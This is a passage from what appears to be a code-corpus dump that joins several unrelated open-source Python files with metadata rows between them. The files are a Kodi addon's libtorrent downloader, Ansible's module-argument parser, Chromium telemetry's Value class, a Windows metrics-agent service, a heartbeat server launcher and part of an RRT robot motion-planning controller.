return __settings__.getSetting(setting).lower() == "true"
class LibraryManager(object):
def __init__(self, dest_path, platform):
self.dest_path = dest_path
self.platform = platform
self.root=filetools.dirname(filetools.dirname(__file__))
ver1, ver2, ver3 = platform['version'].split('.') ### Alfa: resto método
try:
ver1 = int(ver1)
ver2 = int(ver2)
except:
ver1 = 2
ver2 = 0
if ver1 > 1 or (ver1 == 1 and ver2 >= 2):
global __libbaseurl__
__libbaseurl__ = ['https://github.com/alfa-addon/alfa-repo/raw/master/downloads/libtorrent', \
'https://gitlab.com/addon-alfa/alfa-repo/-/raw/master/downloads/libtorrent']
else:
__libbaseurl__ = ["https://github.com/DiMartinoXBMC/script.module.libtorrent/raw/master/python_libtorrent"]
def check_exist(self, dest_path='', platform=''):
if dest_path: self.dest_path = dest_path
if platform: self.platform = platform
for libname in get_libname(self.platform):
if not filetools.exists(filetools.join(self.dest_path, libname)):
return False
return True
def check_update(self):
need_update=False
for libname in get_libname(self.platform):
if libname!='liblibtorrent.so':
self.libpath = filetools.join(self.dest_path, libname)
self.sizepath=filetools.join(self.root, self.platform['system'], self.platform['version'], libname+'.size.txt')
size=str(filetools.getsize(self.libpath))
size_old=open( self.sizepath, "r" ).read()
if size_old!=size:
need_update=True
return need_update
def update(self, dest_path='', platform=''):
if dest_path: self.dest_path = dest_path
if platform: self.platform = platform
if self.check_update():
for libname in get_libname(self.platform):
self.libpath = filetools.join(self.dest_path, libname)
filetools.remove(self.libpath)
self.download()
def download(self, dest_path='', platform=''):
if dest_path: self.dest_path = dest_path
if platform: self.platform = platform
ver1, ver2, ver3 = platform['version'].split('.') ### Alfa: resto método
try:
ver1 = int(ver1)
ver2 = int(ver2)
except:
ver1 = 2
ver2 = 0
if ver1 > 1 or (ver1 == 1 and ver2 >= 2):
global __libbaseurl__
__libbaseurl__ = ['https://github.com/alfa-addon/alfa-repo/raw/master/downloads/libtorrent', \
'https://gitlab.com/addon-alfa/alfa-repo/-/raw/master/downloads/libtorrent']
else:
__libbaseurl__ = ["https://github.com/DiMartinoXBMC/script.module.libtorrent/raw/master/python_libtorrent"]
__settings__ = xbmcaddon.Addon(id='plugin.video.alfa') ### Alfa
filetools.mkdir(self.dest_path)
for libname in get_libname(self.platform):
p_version = self.platform['version']
if PY3: p_version += '_PY3'
dest = filetools.join(self.dest_path, libname)
log("try to fetch %s/%s/%s" % (self.platform['system'], p_version, libname))
for url_lib in __libbaseurl__: ### Alfa
url = "%s/%s/%s/%s.zip" % (url_lib, self.platform['system'], p_version, libname)
url_size = "%s/%s/%s/%s.size.txt" % (url_lib, self.platform['system'], p_version, libname)
if libname!='liblibtorrent.so':
try:
self.http = HTTP()
response = self.http.fetch(url, download=dest + ".zip", progress=False) ### Alfa
log("%s -> %s" % (url, dest))
if response.code != 200: continue ### Alfa
response = self.http.fetch(url_size, download=dest + '.size.txt', progress=False) ### Alfa
log("%s -> %s" % (url_size, dest + '.size.txt'))
if response.code != 200: continue ### Alfa
try:
unzipper = ziptools.ziptools()
unzipper.extract("%s.zip" % dest, self.dest_path)
except:
xbmc.executebuiltin('Extract("%s.zip","%s")' % (dest, self.dest_path))
time.sleep(1)
if filetools.exists(dest):
filetools.remove(dest + ".zip")
except:
import traceback
text = 'Failed download %s!' % libname
log(text)
log(traceback.format_exc(1))
#xbmc.executebuiltin("Notification(%s,%s,%s,%s)" % (__plugin__,text,750,__icon__))
continue
else:
filetools.copy(filetools.join(self.dest_path, 'libtorrent.so'), dest, silent=True) ### Alfa
#dest_alfa = filetools.join(filetools.translatePath(__settings__.getAddonInfo('Path')), \
# 'lib', libname) ### Alfa
#filetools.copy(dest, dest_alfa, silent=True) ### Alfa
dest_alfa = filetools.join(filetools.translatePath(__settings__.getAddonInfo('Profile')), \
'bin', libname) ### Alfa
filetools.remove(dest_alfa, silent=True)
filetools.copy(dest, dest_alfa, silent=True) ### Alfa
break
else:
return False
return True
def android_workaround(self, new_dest_path): ### Alfa (entera)
for libname in get_libname(self.platform):
libpath = filetools.join(self.dest_path, libname)
size = str(filetools.getsize(libpath))
new_libpath = filetools.join(new_dest_path, libname)
if filetools.exists(new_libpath):
new_size = str(filetools.getsize(new_libpath))
if size != new_size:
res = filetools.remove(new_libpath, su=True)
if res:
log('Deleted: (%s) %s -> (%s) %s' %(size, libpath, new_size, new_libpath))
if not filetools.exists(new_libpath):
res = filetools.copy(libpath, new_libpath, ch_mod='777', su=True) ### ALFA
else:
log('Module exists. Not copied... %s' % new_libpath) ### ALFA
return new_dest_path
| gpl-3.0 | 4,003,463,386,131,299,000 | 50.201878 | 127 | 0.530992 | false |
h4ck3rm1k3/ansible | v2/ansible/parsing/mod_args.py | 1 | 10144 | # (c) 2014 Michael DeHaan, <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from six import iteritems, string_types
from types import NoneType
from ansible.errors import AnsibleParserError
from ansible.plugins import module_loader
from ansible.parsing.splitter import parse_kv
class ModuleArgsParser:
"""
There are several ways a module and argument set can be expressed:
# legacy form (for a shell command)
- action: shell echo hi
# common shorthand for local actions vs delegate_to
- local_action: shell echo hi
# most commonly:
- copy: src=a dest=b
# legacy form
- action: copy src=a dest=b
# complex args form, for passing structured data
- copy:
src: a
dest: b
# gross, but technically legal
- action:
module: copy
args:
src: a
dest: b
# extra gross, but also legal. in this case, the args specified
# will act as 'defaults' and will be overriden by any args specified
# in one of the other formats (complex args under the action, or
# parsed from the k=v string
- command: 'pwd'
args:
chdir: '/tmp'
This class has some of the logic to canonicalize these into the form
- module: <module_name>
delegate_to: <optional>
args: <args>
Args may also be munged for certain shell command parameters.
"""
def __init__(self, task_ds=dict()):
assert isinstance(task_ds, dict)
self._task_ds = task_ds
def _split_module_string(self, str):
'''
when module names are expressed like:
action: copy src=a dest=b
the first part of the string is the name of the module
and the rest are strings pertaining to the arguments.
'''
tokens = str.split()
if len(tokens) > 1:
return (tokens[0], " ".join(tokens[1:]))
else:
return (tokens[0], "")
def _handle_shell_weirdness(self, action, args):
'''
given an action name and an args dictionary, return the
proper action name and args dictionary. This mostly is due
to shell/command being treated special and nothing else
'''
# don't handle non shell/command modules in this function
# TODO: in terms of the whole app, should 'raw' also fit here?
if action not in ['shell', 'command']:
return (action, args)
# the shell module really is the command module with an additional
# parameter
if action == 'shell':
action = 'command'
args['_uses_shell'] = True
return (action, args)
def _normalize_parameters(self, thing, action=None, additional_args=dict()):
'''
arguments can be fuzzy. Deal with all the forms.
'''
# final args are the ones we'll eventually return, so first update
# them with any additional args specified, which have lower priority
# than those which may be parsed/normalized next
final_args = dict()
if additional_args:
final_args.update(additional_args)
# how we normalize depends if we figured out what the module name is
# yet. If we have already figured it out, it's an 'old style' invocation.
# otherwise, it's not
if action is not None:
args = self._normalize_old_style_args(thing, action)
else:
(action, args) = self._normalize_new_style_args(thing)
# this can occasionally happen, simplify
if args and 'args' in args:
args = args['args']
# finally, update the args we're going to return with the ones
# which were normalized above
if args:
final_args.update(args)
return (action, final_args)
def _normalize_old_style_args(self, thing, action):
'''
deals with fuzziness in old-style (action/local_action) module invocations
returns tuple of (module_name, dictionary_args)
possible example inputs:
{ 'local_action' : 'shell echo hi' }
{ 'action' : 'shell echo hi' }
{ 'local_action' : { 'module' : 'ec2', 'x' : 1, 'y': 2 }}
standardized outputs like:
( 'command', { _raw_params: 'echo hi', _uses_shell: True }
'''
if isinstance(thing, dict):
# form is like: local_action: { module: 'xyz', x: 2, y: 3 } ... uncommon!
args = thing
elif isinstance(thing, string_types):
# form is like: local_action: copy src=a dest=b ... pretty common
check_raw = action in ('command', 'shell', 'script')
args = parse_kv(thing, check_raw=check_raw)
elif isinstance(thing, NoneType):
# this can happen with modules which take no params, like ping:
args = None
else:
raise AnsibleParserError("unexpected parameter type in action: %s" % type(thing), obj=self._task_ds)
return args
def _normalize_new_style_args(self, thing):
'''
deals with fuzziness in new style module invocations
accepting key=value pairs and dictionaries, and always returning dictionaries
returns tuple of (module_name, dictionary_args)
possible example inputs:
{ 'shell' : 'echo hi' }
{ 'ec2' : { 'region' : 'xyz' }
{ 'ec2' : 'region=xyz' }
standardized outputs like:
('ec2', { region: 'xyz'} )
'''
action = None
args = None
if isinstance(thing, dict):
# form is like: copy: { src: 'a', dest: 'b' } ... common for structured (aka "complex") args
thing = thing.copy()
if 'module' in thing:
action = thing['module']
args = thing.copy()
del args['module']
elif isinstance(thing, string_types):
# form is like: copy: src=a dest=b ... common shorthand throughout ansible
(action, args) = self._split_module_string(thing)
check_raw = action in ('command', 'shell', 'script')
args = parse_kv(args, check_raw=check_raw)
else:
# need a dict or a string, so giving up
raise AnsibleParserError("unexpected parameter type in action: %s" % type(thing), obj=self._task_ds)
return (action, args)
def parse(self):
'''
Given a task in one of the supported forms, parses and returns
returns the action, arguments, and delegate_to values for the
task, dealing with all sorts of levels of fuzziness.
'''
thing = None
action = None
delegate_to = None
args = dict()
#
# We can have one of action, local_action, or module specified
#
# this is the 'extra gross' scenario detailed above, so we grab
# the args and pass them in as additional arguments, which can/will
# be overwritten via dict updates from the other arg sources below
# FIXME: add test cases for this
additional_args = self._task_ds.get('args', dict())
# action
if 'action' in self._task_ds:
# an old school 'action' statement
thing = self._task_ds['action']
delegate_to = None
action, args = self._normalize_parameters(thing, additional_args=additional_args)
# local_action
if 'local_action' in self._task_ds:
# local_action is similar but also implies a delegate_to
if action is not None:
raise AnsibleParserError("action and local_action are mutually exclusive", obj=self._task_ds)
thing = self._task_ds.get('local_action', '')
delegate_to = 'localhost'
action, args = self._normalize_parameters(thing, additional_args=additional_args)
# module: <stuff> is the more new-style invocation
# walk the input dictionary to see we recognize a module name
for (item, value) in iteritems(self._task_ds):
if item in module_loader or item == 'meta':
# finding more than one module name is a problem
if action is not None:
raise AnsibleParserError("conflicting action statements", obj=self._task_ds)
action = item
thing = value
action, args = self._normalize_parameters(value, action=action, additional_args=additional_args)
# if we didn't see any module in the task at all, it's not a task really
if action is None:
raise AnsibleParserError("no action detected in task", obj=self._task_ds)
# FIXME: disabled for now, as there are other places besides the shell/script modules where
# having variables as the sole param for the module is valid (include_vars, add_host, and group_by?)
#elif args.get('_raw_params', '') != '' and action not in ('command', 'shell', 'script', 'include_vars'):
# raise AnsibleParserError("this task has extra params, which is only allowed in the command, shell or script module.", obj=self._task_ds)
# shell modules require special handling
(action, args) = self._handle_shell_weirdness(action, args)
return (action, args, delegate_to)
| gpl-3.0 | -3,236,003,832,605,205,000 | 35.489209 | 149 | 0.605185 | false |
sgraham/nope | tools/telemetry/telemetry/value/__init__.py | 1 | 12490 | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
The Value hierarchy provides a way of representing the values measurements
produce such that they can be merged across runs, grouped by page, and output
to different targets.
The core Value concept provides the basic functionality:
- association with a page, may be none
- naming and units
- importance tracking [whether a value will show up on a waterfall or output
file by default]
- other metadata, such as a description of what was measured
- default conversion to scalar and string
- merging properties
A page may actually run a few times during a single telemetry session.
Downstream consumers of test results typically want to group these runs
together, then compute summary statistics across runs. Value provides the
Merge* family of methods for this kind of aggregation.
"""
import os
from telemetry.core import discover
from telemetry.core import util
# When combining a pair of Values togehter, it is sometimes ambiguous whether
# the values should be concatenated, or one should be picked as representative.
# The possible merging policies are listed here.
CONCATENATE = 'concatenate'
PICK_FIRST = 'pick-first'
# When converting a Value to its buildbot equivalent, the context in which the
# value is being interpreted actually affects the conversion. This is insane,
# but there you have it. There are three contexts in which Values are converted
# for use by buildbot, represented by these output-intent values.
PER_PAGE_RESULT_OUTPUT_CONTEXT = 'per-page-result-output-context'
COMPUTED_PER_PAGE_SUMMARY_OUTPUT_CONTEXT = 'merged-pages-result-output-context'
SUMMARY_RESULT_OUTPUT_CONTEXT = 'summary-result-output-context'
class Value(object):
"""An abstract value produced by a telemetry page test.
"""
def __init__(self, page, name, units, important, description,
interaction_record):
"""A generic Value object.
Args:
page: A Page object, may be given as None to indicate that the value
represents results for multiple pages.
name: A value name string, may contain a dot. Values from the same test
with the same prefix before the dot may be considered to belong to
the same chart.
units: A units string.
important: Whether the value is "important". Causes the value to appear
by default in downstream UIs.
description: A string explaining in human-understandable terms what this
value represents.
interaction_record: The string label of the TimelineInteractionRecord with
which this value is associated.
"""
# TODO(eakuefner): Check user story here after migration (crbug.com/442036)
if not isinstance(name, basestring):
raise ValueError('name field of Value must be string.')
if not isinstance(units, basestring):
raise ValueError('units field of Value must be string.')
if not isinstance(important, bool):
raise ValueError('important field of Value must be bool.')
if not ((description is None) or isinstance(description, basestring)):
raise ValueError('description field of Value must absent or string.')
if not ((interaction_record is None) or
isinstance(interaction_record, basestring)):
raise ValueError('interaction_record field of Value must absent or '
'string.')
self.page = page
self.name = name
self.units = units
self.important = important
self.description = description
self.interaction_record = interaction_record
def IsMergableWith(self, that):
return (self.units == that.units and
type(self) == type(that) and
self.important == that.important and
self.interaction_record == that.interaction_record)
@classmethod
def MergeLikeValuesFromSamePage(cls, values):
"""Combines the provided list of values into a single compound value.
When a page runs multiple times, it may produce multiple values. This
function is given the same-named values across the multiple runs, and has
the responsibility of producing a single result.
It must return a single Value. If merging does not make sense, the
implementation must pick a representative value from one of the runs.
For instance, it may be given
[ScalarValue(page, 'a', 1), ScalarValue(page, 'a', 2)]
and it might produce
ListOfScalarValues(page, 'a', [1, 2])
"""
raise NotImplementedError()
@classmethod
def MergeLikeValuesFromDifferentPages(cls, values,
group_by_name_suffix=False):
"""Combines the provided values into a single compound value.
When a full pageset runs, a single value_name will usually end up getting
collected for multiple pages. For instance, we may end up with
[ScalarValue(page1, 'a', 1),
ScalarValue(page2, 'a', 2)]
This function takes in the values of the same name, but across multiple
pages, and produces a single summary result value. In this instance, it
could produce a ScalarValue(None, 'a', 1.5) to indicate averaging, or even
ListOfScalarValues(None, 'a', [1, 2]) if concatenated output was desired.
Some results are so specific to a page that they make no sense when
aggregated across pages. If merging values of this type across pages is
non-sensical, this method may return None.
If group_by_name_suffix is True, then x.z and y.z are considered to be the
same value and are grouped together. If false, then x.z and y.z are
considered different.
"""
raise NotImplementedError()
def _IsImportantGivenOutputIntent(self, output_context):
if output_context == PER_PAGE_RESULT_OUTPUT_CONTEXT:
return False
elif output_context == COMPUTED_PER_PAGE_SUMMARY_OUTPUT_CONTEXT:
return self.important
elif output_context == SUMMARY_RESULT_OUTPUT_CONTEXT:
return self.important
def GetBuildbotDataType(self, output_context):
"""Returns the buildbot's equivalent data_type.
This should be one of the values accepted by perf_tests_results_helper.py.
"""
raise NotImplementedError()
def GetBuildbotValue(self):
"""Returns the buildbot's equivalent value."""
raise NotImplementedError()
def GetChartAndTraceNameForPerPageResult(self):
chart_name, _ = _ConvertValueNameToChartAndTraceName(self.name)
trace_name = self.page.display_name
return chart_name, trace_name
@property
def name_suffix(self):
"""Returns the string after a . in the name, or the full name otherwise."""
if '.' in self.name:
return self.name.split('.', 1)[1]
else:
return self.name
def GetChartAndTraceNameForComputedSummaryResult(
self, trace_tag):
chart_name, trace_name = (
_ConvertValueNameToChartAndTraceName(self.name))
if trace_tag:
return chart_name, trace_name + trace_tag
else:
return chart_name, trace_name
def GetRepresentativeNumber(self):
"""Gets a single scalar value that best-represents this value.
Returns None if not possible.
"""
raise NotImplementedError()
def GetRepresentativeString(self):
"""Gets a string value that best-represents this value.
Returns None if not possible.
"""
raise NotImplementedError()
@staticmethod
def GetJSONTypeName():
"""Gets the typename for serialization to JSON using AsDict."""
raise NotImplementedError()
def AsDict(self):
"""Pre-serializes a value to a dict for output as JSON."""
return self._AsDictImpl()
def _AsDictImpl(self):
d = {
'name': self.name,
'type': self.GetJSONTypeName(),
'units': self.units,
'important': self.important
}
if self.description:
d['description'] = self.description
if self.interaction_record:
d['interaction_record'] = self.interaction_record
if self.page:
d['page_id'] = self.page.id
return d
def AsDictWithoutBaseClassEntries(self):
full_dict = self.AsDict()
base_dict_keys = set(self._AsDictImpl().keys())
# Extracts only entries added by the subclass.
return dict([(k, v) for (k, v) in full_dict.iteritems()
if k not in base_dict_keys])
@staticmethod
def FromDict(value_dict, page_dict):
"""Produces a value from a value dict and a page dict.
Value dicts are produced by serialization to JSON, and must be accompanied
by a dict mapping page IDs to pages, also produced by serialization, in
order to be completely deserialized. If deserializing multiple values, use
ListOfValuesFromListOfDicts instead.
value_dict: a dictionary produced by AsDict() on a value subclass.
page_dict: a dictionary mapping IDs to page objects.
"""
return Value.ListOfValuesFromListOfDicts([value_dict], page_dict)[0]
@staticmethod
def ListOfValuesFromListOfDicts(value_dicts, page_dict):
"""Takes a list of value dicts to values.
Given a list of value dicts produced by AsDict, this method
deserializes the dicts given a dict mapping page IDs to pages.
This method performs memoization for deserializing a list of values
efficiently, where FromDict is meant to handle one-offs.
values: a list of value dicts produced by AsDict() on a value subclass.
page_dict: a dictionary mapping IDs to page objects.
"""
value_dir = os.path.dirname(__file__)
value_classes = discover.DiscoverClasses(
value_dir, util.GetTelemetryDir(),
Value, index_by_class_name=True)
value_json_types = dict((value_classes[x].GetJSONTypeName(), x) for x in
value_classes)
values = []
for value_dict in value_dicts:
value_class = value_classes[value_json_types[value_dict['type']]]
assert 'FromDict' in value_class.__dict__, \
'Subclass doesn\'t override FromDict'
values.append(value_class.FromDict(value_dict, page_dict))
return values
@staticmethod
def GetConstructorKwArgs(value_dict, page_dict):
"""Produces constructor arguments from a value dict and a page dict.
Takes a dict parsed from JSON and an index of pages and recovers the
keyword arguments to be passed to the constructor for deserializing the
dict.
value_dict: a dictionary produced by AsDict() on a value subclass.
page_dict: a dictionary mapping IDs to page objects.
"""
d = {
'name': value_dict['name'],
'units': value_dict['units']
}
description = value_dict.get('description', None)
if description:
d['description'] = description
else:
d['description'] = None
page_id = value_dict.get('page_id', None)
if page_id:
d['page'] = page_dict[int(page_id)]
else:
d['page'] = None
d['important'] = False
interaction_record = value_dict.get('interaction_record', None)
if interaction_record:
d['interaction_record'] = interaction_record
else:
d['interaction_record'] = None
return d
def ValueNameFromTraceAndChartName(trace_name, chart_name=None):
"""Mangles a trace name plus optional chart name into a standard string.
A value might just be a bareword name, e.g. numPixels. In that case, its
chart may be None.
But, a value might also be intended for display with other values, in which
case the chart name indicates that grouping. So, you might have
screen.numPixels, screen.resolution, where chartName='screen'.
"""
assert trace_name != 'url', 'The name url cannot be used'
if chart_name:
return '%s.%s' % (chart_name, trace_name)
else:
assert '.' not in trace_name, ('Trace names cannot contain "." with an '
'empty chart_name since this is used to delimit chart_name.trace_name.')
return trace_name
def _ConvertValueNameToChartAndTraceName(value_name):
"""Converts a value_name into the equivalent chart-trace name pair.
Buildbot represents values by the measurement name and an optional trace name,
whereas telemetry represents values with a chart_name.trace_name convention,
where chart_name is optional. This convention is also used by chart_json.
This converts from the telemetry convention to the buildbot convention,
returning a 2-tuple (measurement_name, trace_name).
"""
if '.' in value_name:
return value_name.split('.', 1)
else:
return value_name, value_name
| bsd-3-clause | 4,884,086,111,514,157,000 | 36.172619 | 80 | 0.703283 | false |
loadimpact/loadimpact-server-metrics | li_metrics_agent_service.py | 1 | 2556 | #!/usr/bin/env python
# coding=utf-8
"""
Copyright 2012 Load Impact
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import li_metrics_agent
import threading
import win32service
import win32serviceutil
import win32event
import servicemanager
import sys
__author__ = "Load Impact"
__copyright__ = "Copyright 2012, Load Impact"
__license__ = "Apache License v2.0"
__version__ = "1.1.1"
__email__ = "[email protected]"
class AgentThread(threading.Thread):
def __init__(self):
super(AgentThread, self).__init__()
self.agent_loop = li_metrics_agent.AgentLoop()
def run(self):
self.agent_loop.run()
def stop(self):
self.agent_loop.stop()
class AgentService(win32serviceutil.ServiceFramework):
_svc_name_ = "LoadImpactServerMetricsAgent"
_svc_display_name_ = "Load Impact server metrics agent"
_svc_description_ = ("Agent for collecting and reporting server metrics "
"to loadimpact.com")
# init service framework
def __init__(self, args):
win32serviceutil.ServiceFramework.__init__(self, args)
# listen for a stop request
self.hWaitStop = win32event.CreateEvent(None, 0, 0, None)
def SvcDoRun(self):
#import servicemanager
rc = None
self.ReportServiceStatus(win32service.SERVICE_RUNNING)
self.agent = AgentThread()
self.agent.start()
# loop until the stop event fires
while rc != win32event.WAIT_OBJECT_0:
# block for 5 seconds and listen for a stop event
rc = win32event.WaitForSingleObject(self.hWaitStop, 1000)
def SvcStop(self):
self.ReportServiceStatus(win32service.SERVICE_STOP_PENDING)
self.agent.stop()
self.agent.join()
win32event.SetEvent(self.hWaitStop)
if __name__ == '__main__':
if len(sys.argv) == 1:
servicemanager.Initialize()
servicemanager.PrepareToHostSingle(AgentService)
servicemanager.StartServiceCtrlDispatcher()
else:
win32serviceutil.HandleCommandLine(AgentService)
| apache-2.0 | -4,460,066,151,057,241,600 | 30.170732 | 77 | 0.687402 | false |
alexliyu/CDMSYSTEM | firewall.py | 1 | 1273 | #!/usr/bin/python
# -*- coding:utf-8 -*-
"""
主程序入口
@author:alex
@date:15-2-13
@time:上午11:44
@contact:[email protected]
"""
__author__ = 'alex'
import sys
import os
import ConfigParser
import uuid
from subprocess import Popen, PIPE
from utils.heartbeat import HeartBeatManager
from utils.tools import *
PROJECT_PATH = os.path.abspath(os.path.dirname(__file__))
def init(ini_file=None):
cf = ConfigParser.ConfigParser()
try:
if ini_file:
cf.read(ini_file)
else:
cf.read(os.path.join(PROJECT_PATH, "config.ini"))
redis_host = cf.get("REDIS", "IP")
redis_port = cf.getint("REDIS", "PORT")
listener_host = cf.get("LISTENING", "IP")
listener_port = cf.getint("LISTENING", "PORT")
except Exception, e:
print e
sys.exit(1)
print_info("REDIS端口 %s:%d" % (redis_host, redis_port))
print_info("监听心跳包端口 %s:%d" % (listener_host, listener_port))
print_info("开始运行白名单服务........")
server = HeartBeatManager(redis_host, redis_port, listener_host, listener_port)
server.run()
return True
if __name__ == "__main__":
if len(sys.argv) > 1:
init(sys.argv[1])
else:
init()
| mit | -4,446,706,550,151,536,000 | 21.62963 | 83 | 0.60311 | false |
jadecastro/LTLMoP | src/lib/handlers/motionControl/RRTController.py | 1 | 37133 | #!/usr/bin/env python
"""
===================================================================
RRTController.py - Rapidly-Exploring Random Trees Motion Controller
===================================================================
Uses Rapidly-exploring Random Tree Algorithm to generate paths given the starting position and the goal point.
"""
from numpy import *
from __is_inside import *
import math
import sys,os
from scipy.linalg import norm
from numpy.matlib import zeros
import __is_inside
import time, sys,os
import scipy as Sci
import scipy.linalg
import Polygon, Polygon.IO
import Polygon.Utils as PolyUtils
import Polygon.Shapes as PolyShapes
from math import sqrt, fabs , pi
import random
import thread
import threading
# importing matplotlib to show the path if possible
try:
import matplotlib.pyplot as plt
import matplotlib.animation as animation
import_matplotlib = True
except:
print "matplotlib is not imported. Plotting is disabled"
import_matplotlib = False
class motionControlHandler:
def __init__(self, proj, shared_data,robot_type,max_angle_goal,max_angle_overlap,plotting):
"""
Rapidly-Exploring Random Trees alogorithm motion planning controller
robot_type (int): Which robot is used for execution. BasicSim is 1, ODE is 2, ROS is 3, Nao is 4, Pioneer is 5(default=1)
max_angle_goal (float): The biggest difference in angle between the new node and the goal point that is acceptable. If it is bigger than the max_angle, the new node will not be connected to the goal point. The value should be within 0 to 6.28 = 2*pi. Default set to 6.28 = 2*pi (default=6.28)
max_angle_overlap (float): difference in angle allowed for two nodes overlapping each other. If you don't want any node overlapping with each other, put in 2*pi = 6.28. Default set to 1.57 = pi/2 (default=1.57)
plotting (bool): Check the box to enable plotting. Uncheck to disable plotting (default=True)
"""
self.system_print = False # for debugging. print on GUI ( a bunch of stuffs)
self.finish_print = False # set to 1 to print the original finished E and V before trimming the tree
self.orientation_print = False # show the orientation information of the robot
# Get references to handlers we'll need to communicate with
self.drive_handler = proj.h_instance['drive']
self.pose_handler = proj.h_instance['pose']
# Get information about regions
self.proj = proj
self.coordmap_map2lab = proj.coordmap_map2lab
self.coordmap_lab2map = proj.coordmap_lab2map
self.last_warning = 0
self.previous_next_reg = None
# Store the Rapidly-Exploring Random Tress Built
self.RRT_V = None # array containing all the points on the RRT Tree
self.RRT_E = None # array specifying the connection of points on the Tree
self.E_current_column = None # the current column on the tree (to find the current heading point)
self.Velocity = None
self.currentRegionPoly = None
self.nextRegionPoly = None
self.map = {}
self.all = Polygon.Polygon()
self.trans_matrix = mat([[0,1],[-1,0]]) # transformation matrix for find the normal to the vector
self.stuck_thres = 20 # threshold for changing the range of sampling omega
# Information about the robot (default set to ODE)
if robot_type not in [1,2,3,4,5]:
robot_type = 1
self.system = robot_type
# Information about maximum turning angle allowed from the latest node to the goal point
if max_angle_goal > 2*pi:
max_angle_goal = 2*pi
if max_angle_goal < 0:
max_angle_goal = 0
self.max_angle_allowed = max_angle_goal
# Information about maximum difference in angle allowed between two overlapping nodes
if max_angle_overlap > 2*pi:
max_angle_overlap = 2*pi
if max_angle_overlap < 0:
max_angle_overlap = 0
self.max_angle_overlap = max_angle_overlap
# Information about whether plotting is enabled.
if plotting is True and import_matplotlib == True:
self.plotting = True
else:
self.plotting = False
# Specify the size of the robot
# 1: basicSim; 2: ODE; 3: ROS 4: Nao; 5: Pioneer
# self.radius: radius of the robot
# self.timestep : number of linear segments to break the curve into for calculation of x, y position
# self.step_size : the length of each step for connection to goal point
# self.velocity : Velocity of the robot in m/s in control space (m/s)
if self.system == 1:
self.radius = 5
self.step_size = 25
self.timeStep = 10
self.velocity = 2 # 1.5
if self.system == 2:
self.radius = 5
self.step_size = 15
self.timeStep = 10
self.velocity = 2 # 1.5
elif self.system == 3:
self.ROSInitHandler = shared_data['ROS_INIT_HANDLER']
self.radius = self.ROSInitHandler.robotPhysicalWidth/2
self.step_size = self.radius*3 #0.2
self.timeStep = 8
self.velocity = self.radius/2 #0.08
elif self.system == 4:
self.radius = 0.15*1.2
self.step_size = 0.2 #set the step_size for points be 1/5 of the norm ORIGINAL = 0.4
self.timeStep = 5
self.velocity = 0.05
elif self.system == 5:
self.radius = 0.15
self.step_size = 0.2 #set the step_size for points be 1/5 of the norm ORIGINAL = 0.4
self.timeStep = 5
self.velocity = 0.05
# Operate_system (int): Which operating system is used for execution.
# Ubuntu and Mac is 1, Windows is 2
if sys.platform in ['win32', 'cygwin']:
self.operate_system = 2
else:
self.operate_system = 1
if self.system_print == True:
print "The operate_system is "+ str(self.operate_system)
# Generate polygon for regions in the map
for region in self.proj.rfi.regions:
self.map[region.name] = self.createRegionPolygon(region)
for n in range(len(region.holeList)): # no of holes
self.map[region.name] -= self.createRegionPolygon(region,n)
# Generate the boundary polygon
for regionName,regionPoly in self.map.iteritems():
self.all += regionPoly
# Start plotting if operating in Windows
if self.operate_system == 2 and self.plotting ==True:
# start using anmination to plot the robot
self.fig = plt.figure()
self.ax = self.fig.add_subplot(111)
self.scope = _Scope(self.ax,self)
thread.start_new_thread(self.jplot,())
def gotoRegion(self, current_reg, next_reg, last=False):
"""
If ``last`` is True, we will move to the center of the destination region.
Returns ``True`` if we've reached the destination region.
"""
if current_reg == next_reg and not last:
# No need to move!
self.drive_handler.setVelocity(0, 0) # So let's stop
return True
# Find our current configuration
pose = self.pose_handler.getPose()
# Check if Vicon has cut out
# TODO: this should probably go in posehandler?
if math.isnan(pose[2]):
print "WARNING: No Vicon data! Pausing."
self.drive_handler.setVelocity(0, 0) # So let's stop
time.sleep(1)
return False
###This part will be run when the robot goes to a new region, otherwise, the original tree will be used.
if not self.previous_next_reg == next_reg:
# Entered a new region. New tree should be formed.
self.nextRegionPoly = self.map[self.proj.rfi.regions[next_reg].name]
self.currentRegionPoly = self.map[self.proj.rfi.regions[current_reg].name]
if self.system_print == True:
print "next Region is " + str(self.proj.rfi.regions[next_reg].name)
print "Current Region is " + str(self.proj.rfi.regions[current_reg].name)
#set to zero velocity before tree is generated
self.drive_handler.setVelocity(0, 0)
if last:
transFace = None
else:
# Determine the mid points on the faces connecting to the next region (one goal point will be picked among all the mid points later in buildTree)
transFace = None
q_gBundle = [[],[]] # list of goal points (midpoints of transition faces)
face_normal = [[],[]] # normal of the trnasition faces
for i in range(len(self.proj.rfi.transitions[current_reg][next_reg])):
pointArray_transface = [x for x in self.proj.rfi.transitions[current_reg][next_reg][i]]
transFace = asarray(map(self.coordmap_map2lab,pointArray_transface))
bundle_x = (transFace[0,0] +transFace[1,0])/2 #mid-point coordinate x
bundle_y = (transFace[0,1] +transFace[1,1])/2 #mid-point coordinate y
q_gBundle = hstack((q_gBundle,vstack((bundle_x,bundle_y))))
#find the normal vector to the face
face = transFace[0,:] - transFace[1,:]
distance_face = norm(face)
normal = face/distance_face * self.trans_matrix
face_normal = hstack((face_normal,vstack((normal[0,0],normal[0,1]))))
if transFace is None:
print "ERROR: Unable to find transition face between regions %s and %s. Please check the decomposition (try viewing projectname_decomposed.regions in RegionEditor or a text editor)." % (self.proj.rfi.regions[current_reg].name, self.proj.rfi.regions[next_reg].name)
# Run algorithm to build the Rapid-Exploring Random Trees
self.RRT_V = None
self.RRT_E = None
# For plotting
